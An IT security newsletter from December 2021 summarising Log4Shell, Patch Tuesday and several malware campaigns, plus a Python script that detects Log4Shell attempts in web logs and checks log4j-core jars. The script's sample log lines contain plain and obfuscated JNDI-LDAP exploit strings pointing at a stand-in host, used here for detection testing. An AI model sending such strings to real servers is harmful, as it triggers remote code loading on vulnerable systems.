IT Security Newsletter - 12/15/2021
Microsoft Patch Tuesday, December 2021 Edition
Microsoft, Adobe, and Google all issued security updates to their products today. The Microsoft patches include six previously disclosed security flaws, and one that is already being actively exploited. But this month's Patch Tuesday is overshadowed by the "Log4Shell" 0-day exploit in a popular Java library that web server administrators are now racing to find and patch amid widespread exploitation of the flaw. READ MORE...
Log4Shell: A new fix, details of active attacks, and risk mitigation recommendations
Due to the extraordinarily widespread use of the open-source Apache Log4j library, the saga of the Log4Shell (CVE-2021-44228) vulnerability is nowhere near finished. As Dr. Johannes Ullrich, Dean of Research at the SANS Technology Institute, recently noted, "Log4Shell will continue to haunt us for years to come." His advice? "Dealing with Log4Shell will be a marathon. Treat it as such." So let's look at the latest news that could affect your mitigation and remediation efforts. READ MORE...
Telecom operators targeted in recent espionage hacking campaign
Researchers have spotted a new espionage hacking campaign targeting telecommunication and IT service providers in the Middle East and Asia. The campaign has been conducted over the past six months, and there are tentative links to the Iranian-backed actor MERCURY (aka MuddyWater, SeedWorm, or TEMP.Zagros). The report comes from the Threat Hunter Team at Symantec, which has collected evidence and toolset samples from recent attacks. READ MORE...
Hackers steal Microsoft Exchange credentials using IIS module
Threat actors are installing a malicious IIS web server module named 'Owowa' on Microsoft Exchange Outlook Web Access servers to steal credentials and execute commands on the server remotely. The development of Owowa likely started in late 2020, based on its compilation timestamp and when it was first uploaded to the VirusTotal malware scanning service. Based on Kaspersky's telemetry data, the most recent sample in circulation is from April 2021, targeting servers in Malaysia, Mongolia, Indonesia, and the Philippines. READ MORE...
Microsoft patches spoofing vulnerability exploited by Emotet (CVE-2021-43890)
It's the final Patch Tuesday of 2021, and Microsoft has delivered fixes for 67 vulnerabilities, including a spoofing vulnerability (CVE-2021-43890) actively exploited to deliver the Emotet, Trickbot and Bazaloader malware families. Of the 67 CVE-numbered flaws, CVE-2021-43890 - a Windows AppX Installer spoofing vulnerability - will, understandably, be a patching priority. READ MORE...
SAP Patches Log4Shell Vulnerability in 20 Applications
German software maker SAP is scrambling to patch the Log4Shell vulnerability in its applications and has rolled out fixes for tens of other severe flaws in its products. SAP identified a total of 32 applications affected by CVE-2021-44228, a critical vulnerability in the Apache Log4j Java-based logging tool, and has already shipped patches for 20 of them, while scrambling to fix the remaining 12 as soon as possible. READ MORE...
Apple iOS Update Fixes Cringey iPhone 13 Jailbreak Exploit
As if the Log4Shell hellscape wasn't already driving everybody starkers, it's time to update to iOS 15.2 and a crop of other Apple iGadgets, lest your iPhone get taken over by a malicious app that executes arbitrary code with kernel privileges. To paraphrase one mobile security expert, the iOS 15.2 and iPadOS update - released by Apple on Monday along with updates for macOS, tvOS and watchOS - is as hairy as a Lhasa Apso. READ MORE...
400 Banks' Customers Targeted with Anubis Trojan
Customers of Chase, Wells Fargo, Bank of America and Capital One, along with nearly 400 other financial institutions, are being targeted by a malicious app disguised to look like the official account management platform for French telecom company Orange S.A. Researchers say this is just the beginning. Once downloaded, the malware - a variant of banking trojan Anubis - steals the user's personal data to rip them off, researchers at Lookout warned in a new report. READ MORE...
Log4j: List of vulnerable products and vendor advisories
News about a critical vulnerability in the Apache Log4j logging library broke last week when proof-of-concept exploits started to emerge on Thursday. Log4j is an open-source Java logging framework, part of Apache Logging Services, used at the enterprise level in applications from vendors across the world. Apache released Log4j 2.15.0 to address the maximum-severity vulnerability, currently tracked as CVE-2021-44228 and also referred to as Log4Shell or LogJam. READ MORE...
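The three Log4Shell items above all come down to the same two admin tasks: spotting exploitation attempts in web logs, and finding log4j-core jars that still need the 2.15.0 (or later) fix. The following Python is an added example written for this newsletter, not code from Apache, SANS or any of the linked articles. It de-obfuscates the nested Log4j lookups attackers use to hide the string "jndi" (the ${lower:...}, ${upper:...} and ${key:-default} forms), runs that over a few constructed Apache access-log lines, and inspects a jar for the JndiLookup class and the version declared in its Maven pom.properties. The log lines, IP addresses and the in-memory jar are all constructed for the example; the 2.15.0 threshold is the release named on this page and is a parameter, so substitute whatever the current Apache advisory names.

```python
import io
import re
import zipfile
from typing import Iterable, Optional

# Innermost Log4j lookup: "${" ... "}" whose body contains no braces, i.e. no nested lookup.
_INNER = re.compile(r"\$\{([^{}]*)\}")


def _resolve_lookup(body: str) -> Optional[str]:
    """Evaluate one innermost lookup the way Log4j's substitutor does for the lookups
    attackers use to hide 'jndi'. Returns None for lookups we cannot evaluate offline
    (env, sys, hostName, ...); those are left in place."""
    if ":-" in body:                       # ${key:-default}: a failed lookup yields default,
        return body.split(":-", 1)[1]      # which is how ${::-j} and ${env:NOPE:-j} become "j"
    kind, sep, arg = body.partition(":")
    if sep and kind.lower() == "lower":
        return arg.lower()
    if sep and kind.lower() == "upper":
        return arg.upper()
    return None


def find_jndi_lookup(text: str, max_rounds: int = 16) -> Optional[str]:
    """Return the de-obfuscated JNDI lookup present in text, e.g. '${jndi:ldap://host/a}',
    or None. Nested lookups are resolved from the inside out, one layer per round,
    until a body starting with 'jndi:' (case-insensitive, as in Log4j) appears."""
    hits = []

    def _sub(m):
        body = m.group(1)
        if body.lstrip().lower().startswith("jndi:"):
            hits.append(body)
        resolved = _resolve_lookup(body)
        if resolved is not None:
            return resolved
        # Unresolvable lookup: swap its braces for private markers so the regex skips it
        # next round; the markers are restored before the payload is reported.
        return "\x00" + body + "\x01"

    for _ in range(max_rounds):
        new_text = _INNER.sub(_sub, text)
        if hits:
            return "${" + hits[0].replace("\x00", "${").replace("\x01", "}") + "}"
        if new_text == text:
            break
        text = new_text
    return None


def scan_log_lines(lines: Iterable[str]) -> list:
    """Return (1-based line number, de-obfuscated payload) for every suspicious line."""
    return [(n, p) for n, p in ((n, find_jndi_lookup(l)) for n, l in enumerate(lines, 1)) if p]


# Constructed sample access-log lines (not real traffic); line 4 contains the plain
# word "jndi" assembled from a lookup but no JNDI lookup, and must not alert.
SAMPLE_LOG_LINES = [
    '10.0.0.7 - - [15/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [15/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '10.0.0.9 - - [15/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.9/x}"',
    '10.0.0.10 - - [15/Dec/2021:10:01:05 +0000] "GET /?q=${env:NOPE:-j}ndi HTTP/1.1" 404 0 "-" "curl/7.79"',
]

# Paths inside a real log4j-core jar: the lookup class behind CVE-2021-44228 and the
# Maven descriptor that declares the artifact version.
_JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
_POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def _version_tuple(v: str) -> tuple:
    return tuple(int(p) for p in re.findall(r"\d+", v)[:3])


def inspect_log4j_jar(jar_bytes: bytes, fixed_version: str = "2.15.0") -> dict:
    """Report whether a log4j-core jar still ships JndiLookup and whether its declared
    version is below fixed_version (default: the fix release named in this newsletter).
    A jar with JndiLookup and no readable version is flagged, since it cannot be cleared."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        version = None
        if _POM_PROPS in names:
            for line in zf.read(_POM_PROPS).decode().splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    has_jndi = _JNDI_CLASS in names
    below = version is not None and _version_tuple(version) < _version_tuple(fixed_version)
    return {"version": version, "has_jndi_lookup": has_jndi,
            "vulnerable": has_jndi and (below or version is None)}


def build_sample_jar(version: str, with_jndi: bool = True) -> bytes:
    """Constructed stand-in for log4j-core-<version>.jar holding only the entries inspected."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(_POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        if with_jndi:
            zf.writestr(_JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


if __name__ == "__main__":
    for n, payload in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {n}: {payload}")
    print(inspect_log4j_jar(build_sample_jar("2.14.1")))
```

Two caveats when using this on real data: the de-obfuscator only knows the lower/upper/default-value tricks, so a payload built from lookups it cannot evaluate (env or sys values that happen to exist on the target) will not be unwrapped, and absence of hits in access logs says nothing about other logged fields such as headers or form bodies. For jars, run the inspection over every jar on disk and inside nested jars and WARs, since vendors bundle log4j-core under their own names.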
- ...in 1791, the Bill of Rights is ratified by the Virginia General Assembly, officially becoming law.
- ...in 1832, French architect and engineer Gustave Eiffel, the co-designer of the Eiffel Tower, is born in Dijon.
- ...in 1933, the Twenty-first Amendment to the US Constitution goes into effect, repealing the Eighteenth Amendment and ending federal prohibition of alcohol.
- ...in 1978, the United States announces that it will recognize the People's Republic of China, severing diplomatic relations with Taiwan.